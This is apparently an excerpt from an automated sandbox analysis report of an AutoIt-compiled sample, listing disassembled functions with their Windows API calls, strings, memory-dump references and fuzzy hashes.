                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: af8970353d04fbd5f4e254eb336f6ffa7e93712fdf89398b2aa61c105c575c6b
                                                                        • Instruction ID: 35adee98e2c19c67bac4d8f639b1e9274c424294554d0ac4dc99dcb438af5f37
                                                                        • Opcode Fuzzy Hash: af8970353d04fbd5f4e254eb336f6ffa7e93712fdf89398b2aa61c105c575c6b
                                                                        • Instruction Fuzzy Hash: 92122630640241EFEB61DF28C988BA9BBE1FF04314F1446A9FAC5DB25AC735E941DB91
                                                                        Function 00FF27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 2660009612-1645009161
                                                                        • Opcode ID: 9edb498b231199d96abe2b1acf7efe942787d6919f15df255d53ca4a7f41df31
                                                                        • Instruction ID: 79e6b64e0e2618911690fe2405e23472b1696a90d6cf0b8c9d8945e30824ef70
                                                                        • Opcode Fuzzy Hash: 9edb498b231199d96abe2b1acf7efe942787d6919f15df255d53ca4a7f41df31
                                                                        • Instruction Fuzzy Hash: E3A1C531A0020EAFDB21AF61DD82FBE3775BF54780F144069FA85AB2A1DB719E01E750
                                                                        Function 01057B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 01057BC8
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 01057C87
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 01057CC5
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01057CD7
                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01057D1D
                                                                        • GetClientRect.USER32(00000000,?), ref: 01057D29
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01057D6D
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01057D7C
                                                                        • GetStockObject.GDI32(00000011), ref: 01057D8C
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 01057D90
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 01057DA0
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01057DA9
                                                                        • DeleteDC.GDI32(00000000), ref: 01057DB2
                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01057DDE
                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 01057DF5
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01057E30
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01057E44
                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 01057E55
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01057E85
                                                                        • GetStockObject.GDI32(00000011), ref: 01057E90
                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01057E9B
                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01057EA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 0ecaa0ce5efeb5bf52f4f5ea4ad76033f25c5d90ff03901b4bd305c05b8dc59f
                                                                        • Instruction ID: 5ac9488812db8869865daa8c261a1c36c4e7bb278432f4d4491847fec5e361ec
                                                                        • Opcode Fuzzy Hash: 0ecaa0ce5efeb5bf52f4f5ea4ad76033f25c5d90ff03901b4bd305c05b8dc59f
                                                                        • Instruction Fuzzy Hash: 59A18271A00619BFEB24DBA4DC4AFAF7BB9EB45710F048214FA54A72D4C775AD00CB60
                                                                        Function 0104B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0104B361
                                                                        • GetDriveTypeW.KERNEL32(?,01072C4C,?,\\.\,01070980), ref: 0104B43E
                                                                        • SetErrorMode.KERNEL32(00000000,01072C4C,?,\\.\,01070980), ref: 0104B59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: 29bef562cc0409c9d2b33a301d016f74982b50abb54804a3405d645c2f46930a
                                                                        • Instruction ID: a0e131220d5960c46fa7206c79797d82e084c5a78f891718ec02c211d02b29e8
                                                                        • Opcode Fuzzy Hash: 29bef562cc0409c9d2b33a301d016f74982b50abb54804a3405d645c2f46930a
                                                                        • Instruction Fuzzy Hash: 9F51E5B0B40209EB8B10EB75D9D1EBDFBE0BB44710B188179E5C6AB250DE75EA41DB81
                                                                        Function 0106A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0106A0F7
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0106A1B0
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0106A1CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: edd849bb429907b24e7f1dcf349d8186f12cb5233da09e89a85f385b483b2911
                                                                        • Instruction ID: 63324a06bbc04ee6173be462503b0eb43a20392efcd9cd9c7e0feba4abec6982
                                                                        • Opcode Fuzzy Hash: edd849bb429907b24e7f1dcf349d8186f12cb5233da09e89a85f385b483b2911
                                                                        • Instruction Fuzzy Hash: 5602DE30604301EFE765EF18C848BAABBE8FF89714F048659F6D5A72A1C77AD940CB51
                                                                        Function 0106AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0106AF51
                                                                        • SetTextColor.GDI32(?,?), ref: 0106AF55
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0106AF6B
                                                                        • GetSysColor.USER32(0000000F), ref: 0106AF76
                                                                        • CreateSolidBrush.GDI32(?), ref: 0106AF7B
                                                                        • GetSysColor.USER32(00000011), ref: 0106AF93
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0106AFA1
                                                                        • SelectObject.GDI32(?,00000000), ref: 0106AFB2
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0106AFBB
                                                                        • SelectObject.GDI32(?,?), ref: 0106AFC8
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0106AFE7
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0106AFFE
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0106B013
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0106B05F
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0106B086
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0106B0A4
                                                                        • DrawFocusRect.USER32(?,?), ref: 0106B0AF
                                                                        • GetSysColor.USER32(00000011), ref: 0106B0BD
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0106B0C5
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0106B0D9
                                                                        • SelectObject.GDI32(?,0106AC1F), ref: 0106B0F0
                                                                        • DeleteObject.GDI32(?), ref: 0106B0FB
                                                                        • SelectObject.GDI32(?,?), ref: 0106B101
                                                                        • DeleteObject.GDI32(?), ref: 0106B106
                                                                        • SetTextColor.GDI32(?,?), ref: 0106B10C
                                                                        • SetBkColor.GDI32(?,?), ref: 0106B116
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 6e443b01568c26b230e75d802e2a26428cd1ee476e0f9501fa5561034c27575e
                                                                        • Instruction ID: 08d7ccfb66958fa52938b424e9f631e7545a84349fea3768ca4dc40fde689d73
                                                                        • Opcode Fuzzy Hash: 6e443b01568c26b230e75d802e2a26428cd1ee476e0f9501fa5561034c27575e
                                                                        • Instruction Fuzzy Hash: DB6130B1D00218AFEB119FA8DC48AAEBFB9FF09320F104255F955BB295D7769940CF90
                                                                        Function 01068FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 010690EA
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010690FB
                                                                        • CharNextW.USER32(0000014E), ref: 0106912A
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0106916B
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01069181
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01069192
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 010691AF
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 010691FB
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01069211
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 01069242
                                                                        • _memset.LIBCMT ref: 01069267
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 010692B0
                                                                        • _memset.LIBCMT ref: 0106930F
                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01069339
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 01069391
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0106943E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 01069460
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010694AA
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010694D7
                                                                        • DrawMenuBar.USER32(?), ref: 010694E6
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0106950E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 988d708e14d0ee65af6074b44ef8aed85b8216ece1e7a5abbea99c9868c26f68
                                                                        • Instruction ID: cfaa4affac119d3a1b59141f3158e3fa62e933e2d6c1ee784dff2fb1c3733af5
                                                                        • Opcode Fuzzy Hash: 988d708e14d0ee65af6074b44ef8aed85b8216ece1e7a5abbea99c9868c26f68
                                                                        • Instruction Fuzzy Hash: DFE1C270900219AFEF219F54CC84EEE7BBCFF09714F108196FA95AA584D7758A81CF61
                                                                        Function 01064ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 01065007
                                                                        • GetDesktopWindow.USER32 ref: 0106501C
                                                                        • GetWindowRect.USER32(00000000), ref: 01065023
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01065085
                                                                        • DestroyWindow.USER32(?), ref: 010650B1
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010650DA
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010650F8
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0106511E
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 01065133
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01065146
                                                                        • IsWindowVisible.USER32(?), ref: 01065166
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01065181
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01065195
                                                                        • GetWindowRect.USER32(?,?), ref: 010651AD
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 010651D3
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 010651ED
                                                                        • CopyRect.USER32(?,?), ref: 01065204
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 0106526F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 0ba6cbd6a7e0075853909ca868b05b44ccd26a085dc3f208c63d73036b7aac27
                                                                        • Instruction ID: 8c493aa465d970882d58eee5eef57d38f1799f73b65707b114ba3c239467327f
                                                                        • Opcode Fuzzy Hash: 0ba6cbd6a7e0075853909ca868b05b44ccd26a085dc3f208c63d73036b7aac27
                                                                        • Instruction Fuzzy Hash: F4B1AC70604341AFD754DF64CC88B6ABBE8BF89710F008A1CF599AB291D775E804CB92
                                                                        Function 0104498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0104499C
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010449C2
                                                                        • _wcscpy.LIBCMT ref: 010449F0
                                                                        • _wcscmp.LIBCMT ref: 010449FB
                                                                        • _wcscat.LIBCMT ref: 01044A11
                                                                        • _wcsstr.LIBCMT ref: 01044A1C
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01044A38
                                                                        • _wcscat.LIBCMT ref: 01044A81
                                                                        • _wcscat.LIBCMT ref: 01044A88
                                                                        • _wcsncpy.LIBCMT ref: 01044AB3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: a94f7f90d4dfb611e9e5fea0d4ded3870adb7a1b7127bd4ec2547e45dffb2b4b
                                                                        • Instruction ID: 9a5ab51192432414190a36351dd27b802eeb1562ae31845f8a48af3e53562e66
                                                                        • Opcode Fuzzy Hash: a94f7f90d4dfb611e9e5fea0d4ded3870adb7a1b7127bd4ec2547e45dffb2b4b
                                                                        • Instruction Fuzzy Hash: 23414972A002057BFB12B6759C46FFF7BACEF51250F000069F9C4EA191EB74DA1196A5
                                                                        Function 00FE2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE2C8C
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00FE2C94
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE2CBF
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00FE2CC7
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00FE2CEC
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FE2D09
                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FE2D19
                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FE2D4C
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FE2D60
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00FE2D7E
                                                                        • GetStockObject.GDI32(00000011), ref: 00FE2D9A
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE2DA5
                                                                          • Part of subcall function 00FE2714: GetCursorPos.USER32(?), ref: 00FE2727
                                                                          • Part of subcall function 00FE2714: ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00FE13C7), ref: 00FE2DCC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: 51ba375f6aa7b597489228dc9b41f1549b916cee96553fbf5471830966f43dfc
                                                                        • Instruction ID: 24c0c67570adbcab1df8f640277f047798343d20bcb1eb5d64339a0abf1aae64
                                                                        • Opcode Fuzzy Hash: 51ba375f6aa7b597489228dc9b41f1549b916cee96553fbf5471830966f43dfc
                                                                        • Instruction Fuzzy Hash: 38B1C131A4024A9FEB64DFA9CD45BAE7BB4FB08310F108229FA55E7284DB79D800DF50
                                                                        Function 01000429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • GetForegroundWindow.USER32(01070980,?,?,?,?,?), ref: 010004E3
                                                                        • IsWindow.USER32(?), ref: 010366BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground_memmove
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 3828923867-1919597938
                                                                        • Opcode ID: 9d3864b4020b4f31bcde302727ba103c3900d14b29dd099676005d6260e50e39
                                                                        • Instruction ID: 589b909464593726b8a648a082aeb71663ebcbc1ebfa6f77ce0989792c6d591f
                                                                        • Opcode Fuzzy Hash: 9d3864b4020b4f31bcde302727ba103c3900d14b29dd099676005d6260e50e39
                                                                        • Instruction Fuzzy Hash: F4D1F330104202EBDB05EF24C850AAEBBF8BF95384F104A19F5D5932A1DB32EA59DB91
                                                                        Function 0106441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 010644AC
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0106456C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
